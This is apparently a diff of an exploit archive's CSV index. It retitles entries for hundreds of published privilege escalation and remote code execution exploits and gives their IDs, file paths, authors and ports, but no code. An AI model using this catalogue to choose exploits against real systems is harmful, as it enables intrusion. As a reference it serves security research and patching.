 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
-29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
+29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - 'ld.so' Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
 29125,platforms/windows/local/29125.txt,"Avira Internet Security - 'avipbb.sys' Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local,0
 34371,platforms/windows/local/34371.py,"BlazeDVD Pro Player 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0
 29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0
@ -8585,7 +8586,7 @@ id,file,description,date,author,platform,type,port
 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass Exploit",2009-04-10,"Maksymilian Arciemowicz",php,local,0
-32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0
+32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 - libc Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0
 32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0
 33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0
 33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0
@ -8785,10 +8786,10 @@ id,file,description,date,author,platform,type,port
 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0
 37631,platforms/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0
 37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",windows,local,0
-37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
+37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
 37699,platforms/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,windows,local,0
-37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0
+37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - 'XNU' Privilege Escalation",2015-08-18,kpwn,osx,local,0
 37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",linux,local,0
 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
 37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0
@ -8849,7 +8850,7 @@ id,file,description,date,author,platform,type,port
 38357,platforms/linux/local/38357.c,"rpi-update - Insecure Temporary File Handling / Security Bypass",2013-02-28,Technion,linux,local,0
 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation",2015-09-30,cenobyte,osx,local,0
 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
-38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0
+38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation",2015-10-01,rebel,osx,local,0
 38381,platforms/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0
 38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Stack Overflow",2015-10-02,ex_ptr,windows,local,0
 38390,platforms/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Privilege Escalation",2013-03-13,"Sebastian Krahmer",linux,local,0
@ -8865,7 +8866,7 @@ id,file,description,date,author,platform,type,port
 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,windows,local,0
 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - Based Stack Overflow (SEH) (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local,0
 38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
-38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0
+38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0
 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0
 38576,platforms/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0
 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - Crawl website Buffer Overflow",2015-11-02,MandawCoder,windows,local,0
@ -9003,7 +9004,7 @@ id,file,description,date,author,platform,type,port
 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0
 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0
-40141,platforms/bsd/local/40141.c,"NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
+40141,platforms/bsd/local/40141.c,"NetBSD - 'mail.local(8)' Privilege Escalation",2016-07-21,akat1,bsd,local,0
 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' (SEH)",2016-07-25,"Karn Ganeshen",windows,local,0
 40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0
 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0
@ -9213,9 +9214,9 @@ id,file,description,date,author,platform,type,port
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
 41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
-41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
+41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
-41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
+41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
-41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0
+41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0
 42000,platforms/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",windows,local,0
 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
 42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
@ -9243,9 +9244,9 @@ id,file,description,date,author,platform,type,port
 42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local,0
 42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0
 42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
+42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
-42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 42319,platforms/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Privilege Escalation",2017-07-13,geoda,windows,local,0
@ -9304,6 +9305,7 @@ id,file,description,date,author,platform,type,port
 43006,platforms/linux/local/43006.txt,"shadowsocks-libev 3.1.0 - Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,8839
 43007,platforms/linux/local/43007.txt,"Shadowsocks - Log File Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,0
 43017,platforms/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,windows,local,0
 43029,platforms/linux/local/43029.c,"Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation",2017-10-22,"@XeR_0x2A and @chaign_c",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9483,7 +9485,7 @@ id,file,description,date,author,platform,type,port
 404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
 405,platforms/linux/remote/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
 408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0
-409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
+409,platforms/bsd/remote/409.c,"BSD - 'TelnetD' Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)",2004-08-24,Tal0n,linux,remote,0
 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0
 418,platforms/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
@ -11715,7 +11717,7 @@ id,file,description,date,author,platform,type,port
 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0
 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0
 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0
-18181,platforms/freebsd/remote/18181.txt,"ftpd / ProFTPd (FreeBSD) - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
+18181,platforms/freebsd/remote/18181.txt,"FreeBSD - 'ftpd / ProFTPd' Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0
 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0
 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0
@ -11733,7 +11735,7 @@ id,file,description,date,author,platform,type,port
 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote,0
 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0
 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Buffer Overflow (Metasploit)",2012-01-14,Metasploit,linux,remote,0
-18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0
+18369,platforms/bsd/remote/18369.rb,"FreeBSD - Telnet Service Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0
 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote,0
 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote,0
 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",windows,remote,0
@ -11834,7 +11836,7 @@ id,file,description,date,author,platform,type,port
 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution (Metasploit)",2012-06-10,Metasploit,windows,remote,0
 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug Exploit",1988-08-01,anonymous,linux,remote,0
 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
-19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0
+19039,platforms/bsd/remote/19039.txt,"BSD 4.2 - 'fingerd' Buffer Overflow",1988-10-01,anonymous,bsd,remote,0
 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0
 19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit",1992-05-27,anonymous,solaris,remote,0
 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0
@ -11942,8 +11944,8 @@ id,file,description,date,author,platform,type,port
 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0
 19475,platforms/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0
 19476,platforms/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0
-19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0
+19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0
-19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0
+19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0
 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,remote,3817
 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0
 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0
@ -11957,7 +11959,7 @@ id,file,description,date,author,platform,type,port
 19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
-19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0
+19520,platforms/bsd/remote/19520.txt,"BSD - 'TelnetD' Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0
 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",windows,remote,0
@ -12399,7 +12401,7 @@ id,file,description,date,author,platform,type,port
 20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 - Upgrade BDIR.HTR",1998-12-25,"rain forest puppy",windows,remote,0
 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure",2001-01-24,"Security Research Team",multiple,remote,0
 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 - JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",jsp,remote,0
-20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - ipfw Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0
+20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0
 20594,platforms/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote,0
 20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,multiple,remote,0
 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote,0
@ -12470,8 +12472,8 @@ id,file,description,date,author,platform,type,port
 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",windows,remote,0
 20727,platforms/linux/remote/20727.c,"NTPd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0
 20730,platforms/unix/remote/20730.c,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0
-20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - 'glob()' Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
+20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
-20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable FTPd - 'glob()' Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0
+20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0
 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x < 2.8 FTPd - 'glob()' Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0
 20738,platforms/multiple/remote/20738.txt,"PGP 5.x/6.x/7.0 - ASCII Armor Parser Arbitrary File Creation",2001-04-09,"Chris Anley",multiple,remote,0
 20744,platforms/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 - Arbitrary Code Execution",2001-04-10,Kanedaaa,cgi,remote,0
@ -12571,7 +12573,7 @@ id,file,description,date,author,platform,type,port
 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String (2)",2001-06-21,mu-b,linux,remote,0
 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String (3)",2006-10-06,mu-b,linux,remote,0
 21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 - Reverse Proxy",2001-07-18,"Paul Nasrat",linux,remote,0
-21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - TelnetD Buffer Overflow",2001-07-18,Dvorak,unix,remote,0
+21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Buffer Overflow",2001-07-18,Dvorak,unix,remote,0
 20966,platforms/solaris/remote/20966.c,"Netscape PublishingXPert 2.0/2.2/2.5 - Local File Reading",2000-04-06,"\x00\x00",solaris,remote,0
 20968,platforms/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Arbitrary File Creation",2001-06-23,"Michal Zalewski",unix,remote,0
 20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal",2001-06-26,gollum,multiple,remote,0
@ -12718,7 +12720,7 @@ id,file,description,date,author,platform,type,port
 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote,0
 21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)",2002-04-02,"GreyMagic Software",windows,remote,0
 21363,platforms/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0
-21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
+21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x - 'TalkD' User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
 21365,platforms/linux/remote/21365.txt,"phpGroupWare 0.9.13 - Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0
 21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 - File Disclosure",2002-04-07,"Jeremy Roberts",windows,remote,0
 21368,platforms/windows/remote/21368.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (1)",2002-04-10,"CHINANSL Security Team",windows,remote,0
@ -15097,7 +15099,7 @@ id,file,description,date,author,platform,type,port
 35420,platforms/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
 35421,platforms/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
 35422,platforms/hardware/remote/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - 'UltraHVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
-35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0
+35427,platforms/bsd/remote/35427.py,"tnftp (FreeBSD 8/9/10) - 'tnftp' Client Eide Exploit",2014-12-02,dash,bsd,remote,0
 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,osx,remote,0
 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",windows,remote,0
 35441,platforms/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow (Metasploit)",2014-12-02,Metasploit,multiple,remote,655
@ -15917,6 +15919,10 @@ id,file,description,date,author,platform,type,port
 42984,platforms/windows/remote/42984.rb,"Sync Breeze Enterprise 10.1.16 - Buffer Overflow (SEH) (Metasploit)",2017-10-13,wetw0rk,windows,remote,0
 42996,platforms/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",ios,remote,0
